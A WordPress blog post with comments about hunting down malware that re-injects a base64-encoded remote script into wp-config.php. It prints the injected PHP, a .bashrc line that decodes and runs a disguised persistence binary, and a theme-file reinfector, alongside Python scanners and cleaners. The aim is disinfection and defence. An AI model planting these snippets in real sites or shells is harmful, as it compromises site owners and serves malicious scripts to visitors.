On my WordPress site, base64-encoded virus code kept being re-added to the wp-config.php file at regular intervals.
Despite searching the site files and the database (especially the wp_options table), I could not find the source of the virus.
The Wordfence: WordPress Security Plugin could not find this virus either.
After struggling for a long time, I was able to find where the virus was hiding.
Virus code added to the wp-config.php file:
<?php
ini_set("display_errors",0);
ini_set("display_startup_errors",0);
if (PHP_SAPI !== "cli"
    && (strpos(@$_SERVER["REQUEST_URI"], "/wp-admin/admin-ajax.php") === false
    && strpos(@$_SERVER["REQUEST_URI"], "/wp-json") === false
    && strpos(@$_SERVER["REQUEST_URI"], "/wp/v2") === false
    && strpos(@$_SERVER["REQUEST_URI"], "/wp-admin") === false
    && strpos(@$_SERVER["REQUEST_URI"], "/wp-login.php") === false
    && strtolower(@$_SERVER["HTTP_X_REQUESTED_WITH"]) !== "xmlhttprequest")) {
    print(base64_decode("PHNjcmlwdCBzcmM9Ii8vc3luYy5nc3luZGljYXRpb24uY29tLyI+PC9zY3JpcHQ+"));
}
?>
The base64 string decodes to <script src="//sync.gsyndication.com/"></script>. The condition around it skips CLI runs, /wp-admin, /wp-login.php, admin-ajax.php, the REST API (/wp-json, /wp/v2) and XMLHttpRequest calls, so the injected script is served to ordinary visitors but rarely shows up for a logged-in administrator.
/home/Your Username/.bashrc file content:
# .bashrc
# DO NOT REMOVE THIS LINE. SEED PRNG. #defunct-kernel
{ echo L2Jpbi9wa2lsbCAtMCAtVTEwMDcgZGVmdW5jdCAyPi9kZXYvbnVsbCB8fCAoVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPSItayAvaG9tZS9Zb3VyIFVzZXJuYW1lLy5jb25maWcvaHRvcC9kZWZ1bmN0LmRhdCAtbGlxRCIgZXhlYyAtYSAnW2tzd2FwZDBdJyAnL2hvbWUvWW91ciBVc2VybmFtZS8uY29uZmlnL2h0b3AvZGVmdW5jdCcgMj4vZGV2L251bGwp|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel
# Source global definitions
if [ -f /etc/bashrc ]; then
. /etc/bashrc
fi
# Uncomment the following line if you don't like systemctl's auto-paging feature:
# export SYSTEMD_PAGER=
# User specific aliases and functions
The base64 string on the third line decodes to a shell command that checks whether a process named defunct is already running for the user and, if not, launches the virus stored in the /home/Your Username/.config/htop/defunct and /home/Your Username/.config/htop/defunct.dat files, under the fake process name [kswapd0] so that it looks like a kernel thread in the process list. The "DO NOT REMOVE THIS LINE. SEED PRNG." comments are decoys; nothing on that line seeds anything.
I solved this problem by cleaning these files; I hope it will be useful for you too.
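To see what a line like this does without running it, here is an added Python example of my own (not code from the post): it decodes the base64 blob, pulls out the binary it launches, the fake process name it runs under and the files under /home it references, and produces the cleaned .bashrc. The sample .bashrc is the one from the post, reconstructed with the "Your Username" placeholder; the decode-and-run regex and the "DO NOT REMOVE" decoy heuristic are my assumptions about how this family looks, not a general rule.

```python
import base64
import re
import shlex

# Constructed sample: the infected .bashrc shown in the post, with the
# "Your Username" placeholder kept exactly as the post shows it.
INFECTED_BASHRC = """# .bashrc
# DO NOT REMOVE THIS LINE. SEED PRNG. #defunct-kernel
{ echo L2Jpbi9wa2lsbCAtMCAtVTEwMDcgZGVmdW5jdCAyPi9kZXYvbnVsbCB8fCAoVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPSItayAvaG9tZS9Zb3VyIFVzZXJuYW1lLy5jb25maWcvaHRvcC9kZWZ1bmN0LmRhdCAtbGlxRCIgZXhlYyAtYSAnW2tzd2FwZDBdJyAnL2hvbWUvWW91ciBVc2VybmFtZS8uY29uZmlnL2h0b3AvZGVmdW5jdCcgMj4vZGV2L251bGwp|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel
# Source global definitions
if [ -f /etc/bashrc ]; then
\t. /etc/bashrc
fi
# Uncomment the following line if you don't like systemctl's auto-paging feature:
# export SYSTEMD_PAGER=
# User specific aliases and functions
"""

# A long base64 blob that is decoded and piped straight into a shell
# (assumed signature of this persistence trick).
DECODE_AND_RUN = re.compile(
    r"echo\s+([A-Za-z0-9+/=]{40,})\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b"
)


def decode_payload(blob: str) -> str:
    """Decode the blob without executing it; tolerate stripped '=' padding."""
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def describe_launcher(cmd: str) -> dict:
    """Extract what a responder needs from the decoded command: the binary it
    starts, the argv[0] it hides behind (exec -a NAME PATH), and every path
    under /home it references (binary and data file)."""
    try:
        tokens = shlex.split(cmd)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        tokens = cmd.split()
    info = {"exec_path": None, "fake_name": None, "home_paths": []}
    for i, tok in enumerate(tokens):
        if tok == "exec" and i + 3 < len(tokens) and tokens[i + 1] == "-a":
            info["fake_name"], info["exec_path"] = tokens[i + 2], tokens[i + 3]
        m = re.search(r"/home/.*?(?=\s-|$)", tok)  # path ends before a " -flag" or token end
        if m:
            info["home_paths"].append(m.group(0))
    info["home_paths"] = sorted(set(info["home_paths"]))
    return info


def analyze_bashrc(text: str) -> list:
    """One finding per decode-and-run line; nothing is executed."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = DECODE_AND_RUN.search(line)
        if m:
            cmd = decode_payload(m.group(1))
            findings.append({"line": lineno, "command": cmd, **describe_launcher(cmd)})
    return findings


def clean_bashrc(text: str) -> str:
    """Drop each decode-and-run line plus the 'DO NOT REMOVE' decoy comment
    directly above it (heuristic: a comment begging not to be removed is the
    social-engineering wrapper, not real configuration)."""
    lines = text.splitlines()
    drop = set()
    for i, line in enumerate(lines):
        if DECODE_AND_RUN.search(line):
            drop.add(i)
            prev = lines[i - 1] if i > 0 else ""
            if prev.lstrip().startswith("#") and "DO NOT REMOVE" in prev.upper():
                drop.add(i - 1)
    return "\n".join(l for i, l in enumerate(lines) if i not in drop) + "\n"


if __name__ == "__main__":
    for f in analyze_bashrc(INFECTED_BASHRC):
        print(f"line {f['line']}: launches {f['exec_path']} as {f['fake_name']}")
        print("  files to remove:", f["home_paths"])
        print("  decoded:", f["command"])
    print(clean_bashrc(INFECTED_BASHRC))
```

On a live host the fake name is what the process list shows: real kernel threads are children of kthreadd (PID 2) and have no /proc/<pid>/exe target, so a "[kswapd0]" owned by the web user whose exe link points under ~/.config/htop is the implant, and it should be stopped before the two files are deleted, otherwise the running copy can simply be restarted by the next login shell.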
Alternative / Workaround
If you can't find the source of the virus, there is a temporary solution that can keep your site safe until you do.
- Open your wp-config.php file.
- Comment out the virus code by adding /* at the beginning and */ at the end (it should look like the example below).
- The virus code will remain in the file but will no longer run.
- And here's the good news: the infected code will not be re-added.
<?php /*
ini_set("display_errors",0);
ini_set("display_startup_errors",0);
if (PHP_SAPI !== "cli"
    && (strpos(@$_SERVER["REQUEST_URI"], "/wp-admin/admin-ajax.php") === false
    && strpos(@$_SERVER["REQUEST_URI"], "/wp-json") === false
    && strpos(@$_SERVER["REQUEST_URI"], "/wp/v2") === false
    && strpos(@$_SERVER["REQUEST_URI"], "/wp-admin") === false
    && strpos(@$_SERVER["REQUEST_URI"], "/wp-login.php") === false
    && strtolower(@$_SERVER["HTTP_X_REQUESTED_WITH"]) !== "xmlhttprequest")) {
    print(base64_decode("PHNjcmlwdCBzcmM9Ii8vc3luYy5nc3luZGljYXRpb24uY29tLyI+PC9zY3JpcHQ+"));
}
*/ ?>
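As an added example (my own code, not the post's), the workaround and the full cleanup as a script: it finds closed <?php ... ?> blocks in wp-config.php that decode a base64 literal, shows what the literal decodes to without evaluating any PHP, and either wraps the block in /* */ exactly as above or removes it. The sample wp-config.php is constructed with placeholder DB values and the block from the post appended after the extra ?> that the re-infection needs. One caveat the script enforces: if a payload ever contained */, wrapping it in a comment would end the comment early and leave the rest of the block live, so comment mode refuses and you fall back to removal.

```python
import base64
import re

# The base64 literal the injected block prints; decodes to the remote
# <script> tag shown in the post.
MARKER = "PHNjcmlwdCBzcmM9Ii8vc3luYy5nc3luZGljYXRpb24uY29tLyI+PC9zY3JpcHQ+"

# Constructed sample: a minimal wp-config.php (placeholder values) with the
# block from the post appended after the closing "?>" the injector adds.
INFECTED_WP_CONFIG = '''<?php
define('DB_NAME', 'example_db');
define('DB_USER', 'example_user');
if (!defined('ABSPATH')) { define('ABSPATH', __DIR__ . '/'); }
require_once ABSPATH . 'wp-settings.php';
?>
<?php ini_set("display_errors",0); ini_set("display_startup_errors",0); if (PHP_SAPI !== "cli" && (strpos(@$_SERVER["REQUEST_URI"], "/wp-admin/admin-ajax.php") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-json") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp/v2") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-admin") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-login.php") === false && strtolower(@$_SERVER["HTTP_X_REQUESTED_WITH"]) !== "xmlhttprequest")) { print(base64_decode("PHNjcmlwdCBzcmM9Ii8vc3luYy5nc3luZGljYXRpb24uY29tLyI+PC9zY3JpcHQ+")); } ?>
'''

PHP_BLOCK = re.compile(r"<\?php\b(.*?)\?>", re.DOTALL)
B64_LITERAL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')


def _is_commented_out(inner: str) -> bool:
    s = inner.strip()
    return s.startswith("/*") and s.endswith("*/")


def find_injected_blocks(content: str) -> list:
    """Every closed <?php ... ?> block that decodes a base64 literal and is not
    already wrapped in /* */. Returns (start, end, inner) tuples."""
    hits = []
    for m in PHP_BLOCK.finditer(content):
        inner = m.group(1)
        if B64_LITERAL.search(inner) and not _is_commented_out(inner):
            hits.append((m.start(), m.end(), inner))
    return hits


def decoded_payloads(inner: str) -> list:
    """What the block would print, decoded here instead of by PHP."""
    return [base64.b64decode(lit).decode("utf-8", "replace")
            for lit in B64_LITERAL.findall(inner)]


def neutralize(content: str, mode: str = "remove") -> tuple:
    """mode="comment" reproduces the post's workaround (wrap in /* */);
    mode="remove" deletes the block. Returns (new_content, blocks_touched)."""
    hits = find_injected_blocks(content)
    for start, end, inner in reversed(hits):  # edit from the end so offsets stay valid
        if mode == "comment":
            if "*/" in inner:
                # A '*/' inside the payload would close the comment early and
                # leave whatever follows it executable.
                raise ValueError("payload contains '*/'; commenting is unsafe, use mode='remove'")
            replacement = "<?php /*" + inner + "*/ ?>"
        elif mode == "remove":
            replacement = ""
        else:
            raise ValueError(f"unknown mode {mode!r}")
        content = content[:start] + replacement + content[end:]
    return content.rstrip("\n") + "\n", len(hits)


if __name__ == "__main__":
    for _, _, inner in find_injected_blocks(INFECTED_WP_CONFIG):
        print("injected block prints:", decoded_payloads(inner))
    print(neutralize(INFECTED_WP_CONFIG, mode="comment")[0])
```

In comment mode the base64 string stays in the file, which is exactly what keeps the block from being re-added; remove mode gives a clean file but only helps once the thing that writes the block has been found and removed.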
Why don’t people comment and say thank you?
I found this exact thing in my wp-config.php file, minus . But the reason I found your site is because I did a search on //sync.gsyndication.com/ due to seeing before when I viewed page source on the site I’m trying to fix (it’s redirecting to sketchy websites sometimes).
I logged into the WordPress site with SSH and have a home folder for my user, but I don’t have a .bashrc file (or a .config folder). Is there anything else I should look for?
The other issue with WordPress is that Jetpack isn’t connected and there is no way to connect it. It acts like it’s connected and working, but I can’t access any pages or anything because it says Jetpack isn’t connected. The WordPress site is super messed up right now.
The .bashrc file is available in CentOS Web Panel. You are probably using cPanel, and it may have leaked into another file.
You can use the alternative solution until you find the source of the problem.
I did not understand what you want to do in Jetpack plugin, please give more detailed information.
I’m new to WordPress, and I’m doing this for a friend. Apparently she has business plan which includes domains and hosting, and forced usage of Jetpack, so I can’t disable it or anything, and it’s connected, yet not connected; I don’t understand what’s happening and I can’t access any pages from the dashboard because it says Jetpack is not connected (that I’m not connected to the site). So I have to SSH in (can enable SSH from the Server Settings page, and can also access phpMyAdmin from the Server Settings page as well). It’s all hosted by WordPress (and in the wp-config.php it says that “Database connection information automatically provided by Pressable.”).
So I also was scouring the database, and in the wp_options table, I found under the option_name, wpw_auto_poster_wordpress_mapped_posttypes, the option_value:
a:22:{s:4:"post";a:4:{i:0;s:8:"facebook";i:1;s:7:"twitter";i:2;s:8:"linkedin";i:3;s:90:"onetwo\">\\";}s:4:"page";s:0:"";s:10:"attachment";s:0:"";s:14:"e-landing-page";s:0:"";s:17:"elementor_library";s:0:"";s:7:"product";s:0:"";s:12:"sfwd-courses";s:0:"";s:12:"sfwd-lessons";s:0:"";s:10:"sfwd-topic";s:0:"";s:9:"sfwd-quiz";s:0:"";s:7:"ld-exam";s:0:"";s:17:"sfwd-certificates";s:0:"";s:6:"groups";s:0:"";s:17:"sfwd-transactions";s:0:"";s:12:"guest-author";s:0:"";s:15:"magee_portfolio";s:0:"";s:13:"mailpoet_page";s:0:"";s:11:"sfwd-essays";s:0:"";s:15:"sfwd-assignment";s:0:"";s:19:"woowgallery-dynamic";s:0:"";s:11:"testimonial";s:0:"";s:9:"pdfviewer";s:0:"";}
looks kind of suspicious to me, so I removed that (I backed up the value first, though). While it has no negative effects, I *still* can’t get the redirection to stop.
The redirection always starts with cloudcdnstaticDOTcom then citadoresDOTcom then a sketchy website of choice.
The code starting with “a:22:{s:4:”post”;a:4:” is not a virus.
AHA. That’s because your blog comments are removing the script portion automatically. I tried to post it again and noticed it was gone. Let’s see if this works:
Your blog is automatically removing it, probably because they’re the script tags. I’m going to modify it by removing the greater/lesser than signs:
script src=https://aka.cloudsyndication.dev/ /script
If this shows up for you, that’s what was in the value.
Yes, this is a virus code.
Do you believe that:
script src=https://aka.cloudsyndication.dev/ /script
in the database is the source of the virus? At least in my case? I guess I’m trying to determine if everything is cleaned up. WordPress isn’t getting back to me (I can’t wait to have my friend move away from their hosting services), and I don’t know if they cleared the cache or what because the site no longer redirects or has the malicious code in the head. This happened sometime after I contacted them. I was thinking that I should do a restore to an earlier point because I don’t want my friend’s developers to move all the files to another host when some of them could be malicious. But I can’t control the restore; only WordPress can do that. They said they did a scan and didn’t find anything malicious, and that’s about all I could get from them.
Yes, this is virus code and it opens a popup on the site for every user who is not logged in as admin. (It is not shown for those who are logged in as admin most of the time.)
I also want to note that I did do the workaround originally (commented out the code as you suggested), but it didn’t stop the redirections.
Disregard the stuff about Jetpack. It was unrelated. What happened was someone else had installed Defender, which blocked access to xmlrpc.php so that Jetpack could no longer access the site. So after I fixed that, I could access the pages from the GUI, and I don’t see any malicious code from there.
Anyways, I cannot, for the life of me, get this redirect hack figured out.
There may be more than one virus on the site; try a full scan with the Wordfence plugin.
Because my friend is using WordPress hosting services (business plan), they won’t allow installation of Wordfence. I tried anyway by attempting to install the zip, but it won’t activate.
Thanks for the article,
I cleaned the .bashrc file, but the code is still appearing again and again in wp-config 🙂
Now I'm going to try the workaround with /* */
You’re welcome, the temporary solution works. If you find a permanent solution, please let us know so everyone can benefit.
I found the source of the problem for me. It was a malicious plugin called “Ultra SEO Processor”. See the code for the plugin here: https://pastebin.com/vDqfqYNL
You can see it in line 222. The plugin folder was called `ultra-seo-processor` and only one file within it, `ultra-seo-processor.php` which contained the code. The plugin page was https://wordpress.com/plugins/ultra-seo-processor but it no longer exists. Another admin on the site had installed it on December 30.
This is not a plugin anyway. They create a similar plugin file and add code, so this is not the real source of the problem.
Most of your files in the main directory are probably infected with code.
Be sure to scan with the Wordfence plugin; you will see that many files are infected with virus code.
I was speaking with someone else about the issue, and this person believes that “UpdraftPlus: WP Backup & Migration” plugin is what caused the breach which allowed someone to take over one of the admin accounts and install the “Ultra SEO Processor” fake plugin.
https://www.searchenginejournal.com/wordpress-backup-plugin-vulnerability-affects-3-million-sites/536693/
Furthermore, I cannot scan with Wordfence because I am unable to install Wordfence. It is all hosted by WordPress, which forces the use of Jetpack, and Jetpack won’t allow Wordfence install. I tried anyway, and it simply won’t happen.
I ended up doing a restore to the point before “Ultra SEO Processor” was installed.
Hi,
I’m fighting with the same virus.
I have found the file .bashrc.
What piece of code do I have to delete, please? I'm not a developer 🙁
Here is my code
# .bashrc
# DO NOT REMOVE THIS LINE. SEED PRNG. #defunct-kernel
{ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMTkxIGRlZnVuY3QgMj4vZGV2L251bGwgfHwgKFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvdGF4aXljYXkvLmNvbmZpZy9odG9wL2RlZnVuY3QuZGF0IC1saXFEIiBleGVjIC1hICdba3dvcmtlcl0nICcvaG9tZS90YXhpeWNheS8uY29uZmlnL2h0b3AvZGVmdW5jdCcgMj4vZGV2L251bGwpCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel
# Source global definitions
if [ -f /etc/bashrc ]; then
. /etc/bashrc
fi
# Uncomment the following line if you don’t like systemctl’s auto-paging feature:
# export SYSTEMD_PAGER=
# User specific aliases and functions
The base64 code starting with L3Vzci9iaW4vcGtpbGwg is a virus. I posted the original file contents in reply to your other comment; replace it with that. Also scan with Wordfence, which will let you fix the infected areas.
I think I have found it.
Do you confirm?
{ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMTkxIGRlZnVuY3QgMj4vZGV2L251bGwgfHwgKFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvdGF4aXljYXkvLmNvbmZpZy9odG9wL2RlZnVuY3QuZGF0IC1saXFEIiBleGVjIC1hICdba3dvcmtlcl0nICcvaG9tZS90YXhpeWNheS8uY29uZmlnL2h0b3AvZGVmdW5jdCcgMj4vZGV2L251bGwpCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel
The original .bashrc file codes are as follows.
# .bashrc
# Source global definitions
if [ -f /etc/bashrc ]; then
. /etc/bashrc
fi
# Uncomment the following line if you don’t like systemctl’s auto-paging feature:
# export SYSTEMD_PAGER=
# User specific aliases and functions
Thanks to you my website is clean \o/
I asked my host how to protect this file. They answered that I can delete it 🙂
That's what I did 🙂
Thank you so much.
Nice. By the way, I found this piece of code in several 404 and hidden-404 PHP pages of different themes:
$cdn = ''; // the payload to append (empty as posted)
foreach ($directories as $directory) {
    $index_path = $directory . '/wp-config.php';
    if (file_exists($index_path) && is_writable($index_path)) {
        $index_content = file_get_contents($index_path);
        // wp-config.php normally has no closing tag; add one so the
        // appended block starts in HTML mode
        if (substr(trim($index_content), -2) !== "?>") {
            $index_content .= "\n?>";
        }
        // only re-append when the marker string is absent
        if (strpos($index_content, 'PHNjcmlwdCBzcmM9Ii8vc3luYy5nc3luZGljYXRpb24uY29tLyI+PC9zY3JpcHQ+') === false) {
            $index_content .= "\n" . $cdn;
        }
        file_put_contents($index_path, $index_content);
    } else {
        error_log("File not found or not writable: $index_path");
    }
}
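Added example (my own code, not from the comment above or the post): a scanner for the dropper rather than for its output. The indicators are taken from the snippet above and are my assumptions about this family: theme code that rewrites wp-config.php, which no legitimate theme file does, or that carries a base64 literal starting with PHNjcmlwdCBzcmM9, the encoding of '<script src=', which catches the same trick with a different domain. The sample tree is constructed in a temporary directory (theme name and file names are made up): one infected hidden-404.php with the snippet, a clean 404.php, and a functions.php that writes a cache file, to show that file_put_contents on its own is not flagged.

```python
import os
import re
import tempfile

# Indicators drawn from the reinfector snippet above. The base64 prefix is
# the encoding of '<script src=', so it matches any injected remote script
# tag, not only the sync.gsyndication.com one from this post.
INDICATORS = [
    ("targets wp-config.php", re.compile(r"wp-config\.php")),
    ("rewrites a file", re.compile(r"\bfile_put_contents\s*\(")),
    ("checks writability first", re.compile(r"\bis_writable\s*\(")),
    ("base64 <script src= literal", re.compile(r"PHNjcmlwdCBzcmM9[A-Za-z0-9+/=]*")),
]

# Constructed sample files. The dropper text is the snippet from the comment,
# with the (empty) $cdn left as it was posted.
DROPPER = r'''<?php
$cdn = '';
foreach ($directories as $directory) {
    $index_path = $directory . '/wp-config.php';
    if (file_exists($index_path) && is_writable($index_path)) {
        $index_content = file_get_contents($index_path);
        if (substr(trim($index_content), -2) !== "?>") {
            $index_content .= "\n?>";
        }
        if (strpos($index_content, 'PHNjcmlwdCBzcmM9Ii8vc3luYy5nc3luZGljYXRpb24uY29tLyI+PC9zY3JpcHQ+') === false) {
            $index_content .= "\n" . $cdn;
        }
        file_put_contents($index_path, $index_content);
    }
}
'''
CLEAN_404 = "<?php get_header(); ?>\n<h1>Not found</h1>\n<?php get_footer(); ?>\n"
# Legitimate theme code that writes a file: must not be flagged on its own.
CLEAN_FUNCTIONS = "<?php\nfile_put_contents(__DIR__ . '/cache.json', json_encode($data));\n"


def scan_file(path: str) -> list:
    """Names of the indicators present in one PHP file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return [name for name, rx in INDICATORS if rx.search(text)]


def is_dropper(hits: list) -> bool:
    """Theme code has no business rewriting wp-config.php; the encoded
    '<script src=' literal is damning on its own."""
    return ({"targets wp-config.php", "rewrites a file"} <= set(hits)
            or "base64 <script src= literal" in hits)


def scan_tree(root: str) -> dict:
    """Map of relative path -> indicators for every flagged .php file."""
    flagged = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            hits = scan_file(path)
            if is_dropper(hits):
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                flagged[rel] = hits
    return flagged


def build_sample_tree(root: str) -> None:
    """Write the constructed sample theme under root."""
    theme = os.path.join(root, "wp-content", "themes", "sometheme")
    os.makedirs(theme)
    samples = [("hidden-404.php", DROPPER), ("404.php", CLEAN_404),
               ("functions.php", CLEAN_FUNCTIONS)]
    for name, body in samples:
        with open(os.path.join(theme, name), "w", encoding="utf-8") as fh:
            fh.write(body)


def demo() -> dict:
    """Build the sample tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, "->", ", ".join(hits))
```

Point it at the real document root with scan_tree("/path/to/site") and treat every flagged file as the thing to remove first: cleaning wp-config.php while such a file remains is what produces the "it keeps coming back" reports in these comments.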